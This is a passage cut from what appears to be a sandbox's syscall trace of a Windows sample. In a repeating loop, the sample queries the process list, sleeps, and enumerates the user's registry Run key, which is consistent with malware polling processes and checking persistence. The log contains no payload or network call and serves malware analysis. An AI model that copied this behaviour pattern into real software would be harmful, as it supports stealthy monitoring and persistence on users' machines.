RegionSize=0x14e624*=0x20000) returned 0x0 [0185.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.036] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.036] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.048] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.048] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.048] NtClose (Handle=0x154) returned 0x0 [0185.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.055] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.063] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.063] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.063] NtClose (Handle=0x154) returned 0x0 [0185.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.067] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.079] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.079] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.079] NtClose (Handle=0x154) returned 0x0 [0185.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.079] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.084] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.095] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.095] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.095] NtClose (Handle=0x154) returned 0x0 [0185.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.099] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.110] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.110] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.110] NtClose (Handle=0x154) returned 0x0 [0185.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.115] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.126] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.126] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.126] NtClose (Handle=0x154) returned 0x0 [0185.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.126] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.130] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.144] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.144] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.144] NtClose (Handle=0x154) returned 0x0 [0185.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.145] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.146] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.149] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.157] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.157] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.157] NtClose (Handle=0x154) returned 0x0 [0185.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.161] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.174] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.174] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.174] NtClose (Handle=0x154) returned 0x0 [0185.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.175] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.175] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.177] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.188] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.188] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.188] NtClose (Handle=0x154) returned 0x0 [0185.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.190] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.190] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.195] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.214] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.214] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.214] NtClose (Handle=0x154) returned 0x0 [0185.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.218] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.219] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.219] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.219] NtClose (Handle=0x154) returned 0x0 [0185.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.220] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.222] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.235] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.235] NtEnumerateValueKey (in: KeyHandle=0x154, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0x14e008, Length=0x200, ResultLength=0x14e408 | out: KeyValueInformation=0x14e008, ResultLength=0x14e408) returned 0x0 [0185.235] NtClose (Handle=0x154) returned 0x0 [0185.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0185.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0185.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0185.236] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x720000, RegionSize=0x14e624*=0x20000) returned 0x0 [0185.236] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x720000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x720000, ResultLength=0x0) returned 0x0 [0185.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x720000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0185.239] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0185.250] NtCreateKey (in: KeyHandle=0x14e644, DesiredAccess=0x20219, ObjectAttributes=0x14ddb4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-4219442223-4223814209-3835049652-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0x14e644*=0x154) returned 0x0 [0185.250] NtEnumerateValueKey (in: 